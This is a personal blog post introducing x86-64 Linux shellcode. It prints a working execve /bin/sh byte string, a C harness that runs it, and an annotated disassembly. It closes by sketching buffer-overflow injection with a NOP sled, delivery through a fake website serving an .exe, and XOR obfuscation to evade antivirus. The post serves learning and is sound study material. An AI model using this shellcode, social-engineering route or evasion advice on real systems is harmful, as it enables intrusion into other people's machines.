A post about shellcode
Jun 10, 2018
24 comments
So you may ask yourself, like I did what is shellcode? And the deeper you dig the more questions you will ask yourself, well that's how it went with me. I am not a shellcode guru but I would like to share my knowlegde, when I write / teach about something, I understand (I think) it better. This is not a giant introduction explaining everything, it's more about a journey of digging in to shellcode. To answer the first question, shellcode is nothing more then a bunch of binary code like this:
\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05
But what is shellcode really? And what the hell does the above code do?! I'll answer the second question direclty, it spawns a shell on a Linux 64-bit system. Now we get a hint, so shellcode is operating system and CPU architecture bound? Yup that's right, shellcode is operating system and CPU architecture specific. Now what is the code above? the code is binary, represented here as hexadecimal numbers. I didn't get it at first, at first I was like: "this is hex I just parse this with a hex parser" but these are bytes and it could be that they don't have an ASCII representation. But what is shellcode now really? shellcode is binary data that can be read direclty by a CPU. In fact it's 0 and 1, and a CPU, when you feed it this data, can read it and execute whatever it says. I don't believe you, show me the code!
Ok here it is:
#include <stdio.h>
char *code = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
int main () {
int (*ret)() = (int(*)()) code;
ret();
return 0;
}
Compile it with gcc and run it:
$ gcc shell.c -o shell
$ ./shell
You will need to execute it on a 64-bit Linux system. If executed you will see it spawned /bin/sh.
So how this line int (...); really works I don't know a 100%. I do know is that it will take a pointer the character array "code" put it in memory and I want to say execute here, but it does not execute the shellcode, it does set up registers so something points to the address of the shellcode which was put into memory. Can you exlain it even vaguer? Sorry maybe next post explanation :). But now we go deeper in the shellcode, let's analyze that bunch of binary, let's try to see if there is something readable, the hexadecimal readable spectrum goes from 21 to 7E hex or 33 to 127 decimal see man ascii:
#include <stdio.h>
#include <string.h>
char * code = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
int main () {
for (int i = 0; i < strlen(code); i++) {
if ((int) code[i] > 33 && (int) code[i] < 128) {
printf("%c", code[i]);
}
}
printf("\n");
return 0;
}
The output of the previous is:
RH/bin//shSH<$;
So we see something like "/bin//sh", well interesting but this is not the right way to go, A better approach is to look at the assembly code, which is how I wrote the shellcode in the first place.
Disassembly of section .text:
0000000000400080 <_start>:
400080: f7 e6 mul esi
400082: 52 push rdx
400083: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
40008a: 2f 73 68
40008d: 53 push rbx
40008e: 48 8d 3c 24 lea rdi,[rsp]
400092: b0 3b mov al,0x3b
400094: 0f 05 syscall
What the shit is "0x68732f2f6e69622f"?? Yeah my first reaction to, it is actually super straight forward, remember "/bin//sh" from 10 seconds ago? Well that is that:
| Lets take a look at this piece |
\xf7\xe6\x52\x48\xbb \x2f\x62\x69\x6e\x2f\x2f\x73\x68\ x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05
\x2f \x62 \x69 \x6e \x2f \x2f \x73 \x68\
Now there is something called little endian, I always forget about. you need to reverse per 8 bytes ea 64 bits
\x68\ \x73 \x2f \x2f \x6e \x69 \x62 \x2f
0x68732f2f6e69622f
hs//nib/
which if we reverse is /bin//sh
But why /bin//sh and not /bin/sh, the most simple explanation; otherwise it won't work, you need the 2 "/" in the middle. There is another magic code in the assembly "0x3b", which is hex for 59, which is the opcode for the linux system call execve, see https://filippo.io/linux-syscall-table/ for a complete list about syscall codes.
Better commented assembly code:
Disassembly of section .text:
0000000000400080 <_start>:
400080: f7 e6 mul esi ; zero out value esi
400082: 52 push rdx ; push the value in rdx to the stack
400083: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f ; /bin/sh in hexadecimal
40008a: 2f 73 68
40008d: 53 push rbx ; push the string "/bin/sh" to the stack
; load the memory address of the stack pointer, which points to "/bin/sh"
40008e: 48 8d 3c 24 lea rdi,[rsp]
; load the value 59 into register al, which is used as an identifier for system calls
400092: b0 3b mov al,0x3b
; execute the system call according to the value in register al
400094: 0f 05 syscall
Probably some people will ask: "But how can I hack with this?". Well there are 2 ways that I know of:
-
The first is inserting it, I am not going to explain this, there is enough on the internet about it. The way it goes is, a program has an ordered stack of instructions, when an instruction ends, the CPU will move on to the next instruction. Now at a certain point you insert shellcode in the program trying to move it between 2 instructions and with the goal that if an instruction ends and your CPU moves on the the next one it will execute your shellcode instead. This is possible by the fact you overflow a buffer so that the overflowed part is overflowing into the memory part where the instructions are. Your shellcode is part of the overflowing data and with some tweaking with a NOP sled, which are useless instructions added in front of your shellcode to move your shellcode to the right spot in memory.
- The second way is let a person execute it. The oldest way in the book and still the most effective is social engineering of course. A simple fake website with a valid ".exe" and you are good to go. Now here is a catch of course. You need to bypass antivirus, IDS or IPS. So what you need to do is obfuscate your payload, a very easy trick to do is apparently using a XOR'ing method on your payload. but it does not work a 100% at this moment, so it will be for another post.